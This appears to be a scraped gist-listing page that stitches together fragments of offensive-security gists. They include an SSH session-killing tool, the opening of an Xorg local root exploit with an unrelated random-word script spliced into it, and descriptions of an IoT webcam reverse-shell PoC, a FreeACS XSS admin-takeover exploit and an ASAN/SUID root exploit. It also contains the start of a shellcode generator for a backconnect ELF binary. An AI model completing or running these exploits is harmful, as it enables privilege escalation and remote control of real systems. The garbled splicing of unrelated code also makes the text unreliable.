David Davidson 0x27
#!/usr/bin/env bash
# Displays a timeless message in your terminal with cosmic color effects
# Usage: add "sh ~/; sleep 2" to .bash_logout (or similar) in your home directory
# (adjust the sleep variable to display the message for more seconds)
# Cosmic color sequence
echo "SSH hangup user tool. For killing other users connections."
if [ $# -eq 0 ]
then
    echo "use: $0 <PTS number to kill>"
    exit 1
fi
echo "Terminating PTS/$1"
OWNER=$(stat -c '%U' "/dev/pts/$1")
SSH_PID=$(pgrep -a sshd | grep "pts/$1" | cut -d ' ' -f 1)
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
# coding: utf-8
# implements:
# we import some random
import random
# first, we create our arrays, and pick random words from them and store.
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"])
b = random.choice(["escape", "make love to", "smother", "dance with"])
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"])
d = random.choice(["disco", "airport", "changing room", "tumble dryer"])
0x27 / upwned247.php
Created May 5, 2017 11:44 — forked from Wack0/upwned247.php
UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others IoT webcams : remote code exec: reverse shell PoC. (works only in qemu usermode)
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
usermode emulation (seems I pushed an old version), and removed debug output.
If anyone wants to fix this, go ahead (no pun intended).
However, I don't have a vulnerable product and am unwilling to acquire one.
0x27 /
Created April 7, 2017 14:08
FreeACS Remote Takeover 0day (Persistent XSS via CWMP NOTIFY -> Add Admin User
# worlds cheapest exploit - made by copypasting from stackoverflow.
# released at BSides Edinburgh.
# Exploits freeacs -
# TL;DR:
# - Persistent XSS via CWMP Notify message
# - XSS fires in admin session and adds a user
# Darren Martyn - @info_dox - 7th March 2017
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
0x27 /
Created January 19, 2017 15:49 — forked from spaze/
Opera VPN behind the curtains is just a proxy, here's how it works

When setting up (that's immediately when the user enables it in settings), Opera VPN sends a few API requests to to obtain credentials and proxy IPs, see below, also see The Oprah Proxy.

The browser then talks to a proxy (when VPN location is set to Germany), its IP address can only be resolved from within Opera when VPN is on, it's (or similar, see below). It's an HTTP/S proxy which requires auth.

When loading a page with Opera VPN enabled, the browser sends a lot of requests to with a Proxy-Authorization request header.

The Proxy-Authorization header decoded: CC68FE24C34B5B2414FB1DC116342EADA7D5C46B:9B9BE3FAE674A33D1820315F4CC94372926C8210B6AEC0B662EC7CAD611D86A3 (that's sha1(device_id):device_password, where device_id and device_password come from the POST /v2/register_device API call, please note that this decoded header is from another Opera installation and thus contains

Preview of vtscantar (which is going to be re-integrated into hfsdown). Only alerts on the files in the tar that are flagged by VirusTotal.

hack@theplanet:~/vtscantar$ python ~/hfsdown/output/mirror- 
Scanning: /home/hack/hfsdown/output/mirror-
Infected File: DANDNA.apk -> SHA256sum: 72a0745d835d15a707580e3df36396fb2598d61314bb740772a36150d682ea12 -> VirusTotal: 22/55
Infected File: svchost.exe -> SHA256sum: 640525b3d664fe8ae8c861276c15dfec60f6f19db26669dcf28b13620cfced9d -> VirusTotal: 38/53
Infected File: ���22_sign.apk -> SHA256sum: 23f6e9b5e5ba85621d8b7403390825aa767ff6da28132e025844fba1e1ef47f2 -> VirusTotal: 21/54
Infected File: ���˽�_sign.apk -> SHA256sum: 37b02bbfec667862b4f6adcc0429d46e93e7a159244d6ffbf2af27d035d903f5 -> VirusTotal: 22/54
# - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here:
# Video of Exploitation:
# coding: utf-8
# sctp backconnect elf generator v1.0
import socket
import struct
import sys
def make_shellcode(cb_host, cb_port):
    sc = "7f454c4602010100000000000000000002003e00010000007800400000000000"
    sc += "400000000000000000000000000000000000000040003800010000000000000"